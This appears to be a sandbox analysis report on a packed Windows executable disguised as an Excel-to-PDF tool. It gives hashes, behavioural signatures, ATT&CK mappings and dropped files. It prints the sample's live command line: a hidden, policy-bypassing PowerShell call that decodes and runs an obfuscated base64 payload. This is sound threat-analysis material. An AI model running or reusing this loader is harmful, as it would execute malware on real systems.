615f2ce0804791a3975f66ebb3db36dedb50e98b83c0e7a02bce1c2810341fa3

General

Target

MS_Excel-PDF.exe
Size

113KB
MD5

5ceada2de351482df98126c3ebe4c814
SHA1

c2177e31d7559f8ff491b30e6178939ba7593d01
SHA256

615f2ce0804791a3975f66ebb3db36dedb50e98b83c0e7a02bce1c2810341fa3
SHA512

87e9c0b58a73c29651c821cf1fcc6952ff43e525aeaca39c47fade33964291d36619644ccd921a28b4e9b5395b84341f3236c961db65bf72e9e03c287cf95141
SSDEEP

1536:ipfEKNCj6VoJl9Go5K7s4Nu3YwMenouy8MuSUO:iVZ/VGS7rN+vM+outMuS

Score

8^/10

upx

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
29	368	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation	MS_Excel-PDF.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4660-0-0x0000000000400000-0x000000000043F000-memory.dmp	upx
behavioral2/memory/4660-23-0x0000000000400000-0x000000000043F000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
368	powershell.exe
368	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	368	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 4660 wrote to memory of 1680	4660	MS_Excel-PDF.exe	85
PID 4660 wrote to memory of 1680	4660	MS_Excel-PDF.exe	85
PID 1680 wrote to memory of 368	1680	cmd.exe	88
PID 1680 wrote to memory of 368	1680	cmd.exe	88
PID 1680 wrote to memory of 368	1680	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\MS_Excel-PDF.exe
"C:\Users\Admin\AppData\Local\Temp\MS_Excel-PDF.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4660
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\86F3.tmp\86F4.tmp\86F5.bat C:\Users\Admin\AppData\Local\Temp\MS_Excel-PDF.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
    C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader <# thbuadwsdobefjuef efiefbef eefdueopf ef efief ewcf efc uefep fde fdedeh fieo fhded efd hehfei90o epdjei fe fhe0f eife ife hfe heh e e fe fde ifeiohf iefd ef ef hehifdehifhoiefh oiefoi efeo fihhefehfoihefihefoi ef efoh eh ofehoiefhioefhoefhoefhoefhohoefheofhefhoefhoefihfheihiefhiefhifehiofehiefhihefiheoiqffophieww fpwreph oifph oiewfhp weh if hewfh efh ioewf hpwef hewf pewfphew fepw hfwh eifehwf hewfwhe of hiwefhiwefh we hfpiwhepoifhoiwefhoipwehfiwehf #> ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPbbtswDH33VxCGgdqIbTiXdkOKAr0hW4EuK5piewjy4Chso1WWDIlO4nb599Gts61FNwx7MI4skecckVQg4AiOfW96rtRFURpLoX+PVqPq99KFUn40g7KaKynAUU4MuCE+hwtNV2Thi7RU5epEKSPCdm8dQyU1wabFusWH6PC/dc4s5oQ3S4bFTqdqeVcx/FJuV79ptzuNun/ska0fA8eXHuM6+Tz/hoJgUjvCIh0jpRMj7pFcixBO3zg7WSwsOjfKC6nq2XDIAmg5YG3sfQxvZTzjTV0ih0+IL1G8HXhlDRlhVBt6I8rIC1x6ZrRmo+Fef5D2+Dt4l/b2s70YulmWRfAdTEWJrpQ6hKDku01PrM0ba89lu9BcUy0w9Oc1oR/DIOLADQcy9zUKlCsMg/IV0QOfZ15Q/wPf9FQSe1yh5Uo0vg3XpN9jzjiLOvuNWj3NZg3h5nTkrZdSIYSskCj6e3IEj42TzkurdRw8dPbjbvznYo9UfueYbWw0RrD1bo1lRXnUZS+SdREGzarTYQU2F8jG3Y7ulaMPSKd8URdOeaRmbORjrhcKI85KurOtFxDn8lQkTdsgKbCYoz3HW6klSaMhEJCM8wLB/yp1v+dDovnPlblAeNoZVVo0kQ6SMneOlrZqGnQU0HD44oVlcVCnl6jvaBlnmz53n2GQRd7O+XWlSRaYPs2kKSdoV1KgSz/l1i1z1bTQlHVTQci4b89vYxYGm3RX9iiK4acITx/tut4+PlaMg03cwKvRm1BuKZkoxBKSCQqjF/D+YJBlW5GTWD5ufwA=\")))), [IO.Compression.CompressionMode]::Decompress)), <# dsihfidubf frniuovn rveoijn fregvn rfv eriog vreig efv iov rvoihf vbh ogtfb tgrfh irghf vhr gtfhu grfhuvbhugrfhufrohrfouihrf rf rfi ohrfhio grfih ofrihrfghirtfgih tgrfhiop rer oihpwoih wihihf rrfhgfrhu u gr gr hgr hhgrhghughug g g rf hgh ug g hugtrbh rgt h igrghi bgtbhigrhbigrihhigrhihi rfg hiih rhi rih h ighi rtghi trghi rthi trghi trghitgrhitrhiohrohighoigohghtgoh oghouhiod hiodcoihhichirhigrihohig #> [Text.Encoding]::ASCII)).ReadToEnd();"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\86F3.tmp\86F4.tmp\86F5.bat

Filesize
2KB

MD5
63a5e29f920402e889ce8ba36dfe1ecc

SHA1
703f0210ec9d59283307f55b44c95b7317f9d821

SHA256
a11c0d2007910030a83f2974401402f0c1fc2959bdad5eea0831963d5a4904f0

SHA512
3860dc4373336de41b2ada00b0f237f41d808cfcefb1cf7b33e84c0a1f2bc7450b6e67b56ca7b3dae0ef992f3cab6515fc95b1baac2840723e2f97a87241c861

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j2mxobro.hpd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/368-17-0x0000000005BB0000-0x0000000005C16000-memory.dmp

Filesize
408KB

Download
memory/368-18-0x0000000005C20000-0x0000000005C86000-memory.dmp

Filesize
408KB

Download
memory/368-5-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

Filesize
64KB

Download
memory/368-6-0x0000000005410000-0x0000000005A38000-memory.dmp

Filesize
6.2MB

Download
memory/368-3-0x0000000002B00000-0x0000000002B36000-memory.dmp

Filesize
216KB

Download
memory/368-12-0x0000000005310000-0x0000000005332000-memory.dmp

Filesize
136KB

Download
memory/368-27-0x0000000072E80000-0x0000000073630000-memory.dmp

Filesize
7.7MB

Download
memory/368-4-0x0000000072E80000-0x0000000073630000-memory.dmp

Filesize
7.7MB

Download
memory/368-19-0x0000000006100000-0x000000000611E000-memory.dmp

Filesize
120KB

Download
memory/368-20-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

Filesize
64KB

Download
memory/368-21-0x0000000007A30000-0x00000000080AA000-memory.dmp

Filesize
6.5MB

Download
memory/368-22-0x0000000006620000-0x000000000663A000-memory.dmp

Filesize
104KB

Download
memory/368-24-0x0000000072E80000-0x0000000073630000-memory.dmp

Filesize
7.7MB

Download
memory/4660-23-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download
memory/4660-0-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download

Analysis

Sharing